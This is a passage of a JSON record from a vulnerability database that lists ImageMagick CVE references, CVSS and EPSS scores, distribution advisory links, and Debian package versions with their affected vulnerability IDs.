"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730596", "reference_id": "1730596", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730596" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931455", "reference_id": "931455", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931455" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-13297" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "4.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-aej5-sgf8-7uhp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49500?format=api", "vulnerability_id": "VCID-agz5-g8mr-e7hn", "summary": "Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-32546.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-32546.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-32546", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00113", "scoring_system": "epss", "scoring_elements": "0.29981", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00113", "scoring_system": "epss", "scoring_elements": "0.30029", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00113", "scoring_system": "epss", "scoring_elements": "0.29843", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00113", "scoring_system": "epss", "scoring_elements": "0.29905", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00113", "scoring_system": "epss", "scoring_elements": "0.29941", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00113", "scoring_system": "epss", "scoring_elements": "0.29946", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00123", "scoring_system": "epss", "scoring_elements": "0.31455", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00123", "scoring_system": "epss", "scoring_elements": "0.31458", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00123", "scoring_system": "epss", "scoring_elements": "0.31421", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00123", "scoring_system": "epss", "scoring_elements": "0.3123", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00123", "scoring_system": "epss", "scoring_elements": "0.31433", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00123", "scoring_system": "epss", "scoring_elements": "0.31402", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-32546" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32546", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32546" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016442", "reference_id": "1016442", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016442" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091812", "reference_id": "2091812", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091812" }, { "reference_url": "https://security.gentoo.org/glsa/202405-02", "reference_id": "GLSA-202405-02", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202405-02" }, { "reference_url": "https://usn.ubuntu.com/5534-1/", "reference_id": "USN-5534-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5534-1/" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, 